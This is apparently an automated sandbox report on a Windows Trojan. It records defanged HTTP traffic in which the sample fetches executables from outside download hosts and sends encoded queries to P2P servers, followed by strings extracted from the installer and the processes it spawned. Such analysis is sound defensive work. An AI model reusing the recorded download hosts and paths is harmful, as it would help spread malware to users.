HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35999768410581376522110712
Server: Apache
tracecode: 35999768410581376522110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B4ADDD1A7D9EA5912:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00063499440581376522110713
Server: Apache
tracecode: 00063499440581376522110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC09AA604EAEAD5BD2:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
POST /query?cmd=validurl HTTP/1.1
Content-Length: 114
Connection: Keep-Alive
.#4H.......F..>.............................#.)* DYZ
..W[BX[WX^.OHFV!;#*j&)*g/%9.)!8>~`cefy>6*.:01olYRV[QK.. ijkl
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00024854541213477898110713
Server: Apache
tracecode: 00024854541213477898110713
Set-Cookie: BAIDUID=B2053B857F2258D280860D7625D53A9A:FG=1; expires=Sun, 06-Nov-16 05:00:02 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
9a
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
0
GET /cgi-bin/report?id=89217 HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ui.ptlogin2.qq.com
Connection: Keep-Alive
Cookie: pt_local_token=-1924241393; ptui_qstatus=3
HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Sat, 07 Nov 2015 05:00:30 GMT
Pragma: no-cache
Cache-Control: no-cache; must-revalidate
Content-Type: image/bmp;
Content-Length: 66
GET /View/Home/Task/css.base.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 4860
Last-Modified: Mon, 19 Oct 2015 03:49:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56246855-12fc"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
GET /View/Home/Task/css.task.css?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:50 GMT
Content-Type: text/css
Content-Length: 2042
Last-Modified: Mon, 19 Oct 2015 07:02:19 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "5624957b-7fa"
Expires: Sat, 07 Nov 2015 16:59:50 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
GET /Public/html5shiv/3.7.2/html5shiv.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:51 GMT
Content-Type: application/javascript
Content-Length: 2639
Last-Modified: Sat, 14 Mar 2015 18:06:30 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "550478a6-a4f"
Expires: Sat, 07 Nov 2015 16:59:51 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
GET /Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:52 GMT
Content-Type: application/vnd.ms-fontobject
Content-Length: 20127
Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT
Connection: keep-alive
ETag: "557f7832-4e9f"
Accept-Ranges: bytes
GET /Public/images/sns_qq.png HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:53 GMT
Content-Type: image/png
Content-Length: 1851
Last-Modified: Tue, 19 May 2015 04:17:19 GMT
Connection: keep-alive
ETag: "555ab94f-73b"
Expires: Mon, 07 Dec 2015 04:59:53 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET /Public/jquery/1.11.3/jquery.min.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:55 GMT
Content-Type: application/javascript
Content-Length: 95992
Last-Modified: Wed, 19 Aug 2015 17:28:41 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "55d4bcc9-176f8"
Expires: Sat, 07 Nov 2015 16:59:55 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
GET /View/Home/Task//base.js?1.0.247 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.meiheitou.com
Connection: Keep-Alive
Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: application/javascript
Content-Length: 17513
Last-Modified: Mon, 19 Oct 2015 06:32:55 GMT
Connection: keep-alive
Vary: Accept-Encoding
ETag: "56248e97-4469"
Expires: Sat, 07 Nov 2015 16:59:59 GMT
Cache-Control: max-age=43200
Accept-Ranges: bytes
GET /CSC3-2010.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: csc3-2010-crl.verisign.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
HTTP/1.1 200 OK
Server: Apache
ETag: "7c8bb8b999f19239c68f0bca1cf9491c:1446844256"
Last-Modified: Fri, 06 Nov 2015 21:10:56 GMT
Date: Sat, 07 Nov 2015 05:00:11 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Connection: Transfer-Encoding
Content-Type: application/pkix-crl
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00067820760341062666110713
Server: Apache
tracecode: 00067820760341062666110713
Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC3B14288B214300D1:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache
Host: 103.7.29.215
HTTP/1.1 200 OK
Server: CDN_NWS_4.2.1
Connection: keep-alive
Date: Sat, 07 Nov 2015 05:00:16 GMT
Cache-Control: max-age=600, s-maxage=60
Expires: Sat, 07 Nov 2015 05:10:16 GMT
Last-Modified: Fri, 08 May 2015 02:43:07 GMT
Content-Type: application/octet-stream
Content-Length: 47240016
X-Cache-Lookup: Hit From Disktank
POST /query?cmd=url2finfo HTTP/1.1
Content-Length: 120
Connection: Keep-Alive
.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?# 7;"8xjikhs40,....UV_T\Q_E...opqrstuvw
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991270750315632138110712
Server: Apache
tracecode: 35991270750315632138110712
Set-Cookie: BAIDUID=005B09C6D83A1A4B9146A82791018378:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
GET /mmliao/MM-liao8863.exe HTTP/1.1
Host: mm.appkhh.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 302 Found
Date: Sat, 07 Nov 2015 05:00:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe
Set-Cookie: ASP.NET_SessionId=unvtmf55i2o5pj550p3epgra; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 808
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >
<head><title>.................</title></head>
<body>
<form name="form1" method="post" action="../download/SubConfig.aspx?id1=8863" id="form1">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />
</div>
<div>
<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />
</div>
<div>
</div>
</form>
</body>
</html>
GET /v1/t/full/p/mini/tn/10003408/ch_dl_url.exe HTTP/1.1
Host: j.br.baidu.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.4.1
Date: Sat, 07 Nov 2015 04:59:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.22
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Location: hXXp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe
POST /query?cmd=validurl HTTP/1.1
Content-Length: 117
Connection: Keep-Alive
.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033015391911494410110713
Server: Apache
tracecode: 00033015391911494410110713
Set-Cookie: BAIDUID=37CF03EF72C69E44C1FECBC156BA5EE4:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00128049050818948618110713
Server: Apache
tracecode: 00128049050818948618110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0813C71ECDC5124A9:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 125
Connection: Keep-Alive
.#4H.......QC...............................y6...............................................................................
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00072362801213477898110713
Server: Apache
tracecode: 00072362801213477898110713
Set-Cookie: BAIDUID=A9AAE706CAC814E2200D085686071519:FG=1; expires=Sun, 06-Nov-16 05:00:07 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 700
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00119517720658453514110713
Server: Apache
tracecode: 00119517720658453514110713
Set-Cookie: BAIDUID=2C7B1E2C3C0DA05794EB27122BF6134F:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:14 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00145449851213477898110713
Server: Apache
tracecode: 00145449851213477898110713
Set-Cookie: BAIDUID=E927C7BA6E0D653E6B7119B2F952D9BD:FG=1; expires=Sun, 06-Nov-16 05:00:14 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /commit?cmd=finfo HTTP/1.1
Content-Length: 543
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00129075050581376522110713
Server: Apache
tracecode: 00129075050581376522110713
Set-Cookie: BAIDUID=2B26F61FAC88F8F0FC4D9B271683B1BE:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
POST /query?cmd=validurl HTTP/1.1
Content-Length: 96
Connection: Keep-Alive
.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno
HTTP/1.1 302 Moved Temporarily
Date: Sat, 07 Nov 2015 05:00:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00017557620315632138110713
Server: Apache
tracecode: 00017557620315632138110713
Set-Cookie: BAIDUID=69DAC83DF6D595A3324C44730134BB38:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
P3P: CP=" OTI DSP COR IVA OUR IND COM "
<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>nginx</center>
</body>
</html>
The Trojan connects to the servers at the following location(s):
.text
`.rdata
@.data
.ndata
.rsrc
RegDeleteKeyExW
Kernel32.DLL
PSAPI.DLL
%s=%s
GetWindowsDirectoryW
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationW
ShellExecuteW
SHELL32.dll
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46-Unicode</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
verifying installer: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
*?|<>/":
E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
OCALS~1\Temp\nsf4.tmp\System.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\ioSpecial.ini
ttp://VVV.xfplay.com
8.9.0 P2P
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp
nsf4.tmp
\Temp\nsf4.tmp\ioSpecial.ini
8-246WCGQ598DE}) i .r1 ?e
.2900.5512
m\LOCALS~1\Temp\nsf4.tmp
nfeng.exe
6.0.2900.5512
xianfeng.exe
"%Program Files%\xfplay\xianfeng.exe"
%Program Files%\xfplay
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Program Files%\xfplay\xianfeng.exe
554304191
1.1.2.1
9.0.1 P2P
iexplore.exe_1676:
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
BaiduP2PService.exe_472:
.text
`.rdata
@.data
.rsrc
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
.mixcrt
KERNEL32.DLL
mscoree.dll
GetProcessWindowStation
USER32.DLL
operator
kernel32.dll
127.0.0.1
do exit check, update available=%d
xbdyy is running, %d connections
ProcessRequest spend too much time to finish, Cmd=%d, time = %d ms
tcp peer closed
tcp connection error
API Call: Type = -
StartTask: h = 0x%p, r=%d
StopTaskAsync: h = 0x%p, r=%d
StopTaskSync: h = 0x%p, r=%d
FreeTaskHandle: h = 0x%p, r=%d
BatchOperation: h = 0x%p, r=%d
GetTask List,nRet=%d
CreateTask: h = 0x%p,r=%d
DelTempFile: %s\%s
DelResumeInfo: %s\%s
GetTaskInfo: h = 0x%p, Ret=%d, StatCode=%d, nDownload=%d
set playing task, handle = %u
set playing bitrate = %u
set download queue length = %u
set autoupdate on = %u
set lang id = %u
read length %d, bad boy, closed
Read nOff=I64i,nLength=d,nRet=%d
GET /config/status.html
HTTP/1.1 200 OK
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
[d-d-d d:d:d.d]
%%x
Resume Finish [%d]
pending request at pid=%I64i timeout %d, clear
pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d
no retransmit 3,%d%%, tPending=%d
leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d
alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d
block done, remove reserve state : peer id=%I64i, blockid=%d
%I64i have %d
Acc got qid=%s, domain=%s
Acc got no qid, ret=%d, deny acc
XXXXXXXX
Acc got host=%u.%u.%u.%u:%u
XXX
GET %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)
Host: %u.%u.%u.%u:%u
Key: %s
%snOffset=%I64i,%d
%d.%d.%d.%d
Task ID = u
Peers Passive = i
Time Get Login = i ms
Time Login = i ms
Lan IP = %s
Wan IP = %s
%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u
%s : attention, it should not be here,read at %I64u(%I64u), no data, return
%s : read at %I64u(%I64u), no data, return, index=%u, %I64i
%s : -------------------------------------------------- first buffering time=%d, DLed=%I64i
%s : ****************************************************** buffering time=%d
%s : read at %I64u(%I64u), return %i, available=%I64i, 0xx,0xx,0xx,0xx, index=%u,%I64i
%s : peer %s read callback at %I64u,%I64i,%I64i(%i), not ready
%s : peer %s read callback at %I64u(%i), ready
%s : DUP, uid=%I64i, pid=%d, kid=%I64i, total=%I64i
%s : DATA uid=%I64i, pid=%d, kid=%I64i, length=%I64i, avail=%I64i
add reserve state : peer id=%I64i, blockid=%d
REQ uid=%I64i, pid=%d, kid=%d
%s : delete task, index=%u
%s : start p2s, index=%u
%s : stop p2s, index=%u
%s : delete p2p task
%s : create share memory fail, error=%d
%s : start task, index=%u
%s : find resume file
%s : load resume file success
%s : file removed
%s : p2s finish code = %d
%s : filesize = %I64d, full hash length=%d
%s : no p2p fid, choose P2S
%s : no hash array
%s : send full hash done
%s : check url done, code=%d
%s : forbidden
%s : network error
%s : stop task, index=%u
%s : AddEmergencyRange(%I64i,%I64i) %I64i
%s : SetPriorityWindow(%I64i,%I64i)
%s : disk full
%s : create file error, error=%d
%s : rename fail
%s : rename success
%s : add p2p share
%s : task complete
%s : no hash array, need report to server
%s : zero hash at %i, rehash
%s : total verify success, report and add share
%s : total verify fail
%s : complete download ,but not complete verify, recheck
%s : send finish info, range count=%d,verified range=%I64i, total=%I64i
%s : create disk file fail
%s : try write hash piece failed: %I64i - %I64i
%s : memory verify success: %I64i(%I64i)
%s : memory verify fail: %I64i(%I64i)
%s : write piece success: %I64i - %I64i
%s : write piece fail: %I64i - %I64i
%s : disk verify success at %I64i(%i)
%s : disk verify fail at %I64i(%i)
%s : GetTaskInfo
%s : peers_add=%d, peers_total=%d, seeders=%d, downloaders=%d
%s : GetInternalState
%s : GetTaskStatistics
%s : GetBlockInfo
%d total,%I64i(%I64i), %d%%
%s : set task state, state=%d, error=%d
%s : set file size = %I64i
%s : load verify range at %I64i(%i)
%s : load data at %I64i(%i)
%s : on finish range,peer %I64i
%s : alloc %I64i-%I64i,peer %I64i
%s : p2s peer %I64i connected
%s : p2s peer %I64i leave
%s : p2s peer %I64i ready to request : %I64i-%I64i
%s : peer %I64i leave
recv calc verify response, block id=%d, from %I64i
crc at %I64i wrong piece %d, find bad boy
%s : may upload bad data, peer id=%I64i
%s : create p2p task fail, already exists
make a decision, for speed = %dKB/s > 150KB/s
make a decision, for elapse 10 seconds, speed = %dKB/s
choose P2S, P2S=%d KB/s, %s
choose P2P, P2S=%d KB/s
call delete_p2p_task, %u
dup url, url=%s
new task, url=%s
ref=%s
tmp=%s
the same task id %d
create task, index=%u
StopTaskAsync: %u
StopTaskSync: %u
fid=%s, url=%s
tasks.dat exist, do not check tasks.ini
read tasks.ini from %s
acctrack.kuaibo.com
acc.p2sp.baidu.com
0.0.0.0
dudpxp://
[DUDPXP]
index.html
%%%2X
hXXp://
PTF://
%s:%s@
%s%s%s%s%s
hXXp:///
hXXp://%s:%d/%s
cmp2s.p2sp.baidu.com
query?cmd=url2finfo
query?cmd=fid2finfo
query?cmd=validurl
commit?cmd=finfo
P2SCfg.ini
Port
%s %s HTTP/1.1
Content-Length: %d
d:\cygwin\home\scmpf\compiler_src\panfeng02_563106_win32\0\app\gensoft\p2p\client\platform\objs\BaiduP2PService.pdb
P2PBase.dll
?StatAdd@CP2PStatReport@@QAEX_K0@Z
?StatAdd@CP2PStatReport@@QAEX_KQAE@Z
?StatAdd@CP2PStatReport@@QAEX_KPAEI@Z
?SendReport@CP2PStatReport@@QAEHXZ
??1CP2PStatReport@@QAE@XZ
??0CP2PStatReport@@QAE@PBD000@Z
P2PStatReport.dll
P2SBase.dll
GetProcessHeap
KERNEL32.dll
RegisterHotKey
UnregisterHotKey
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
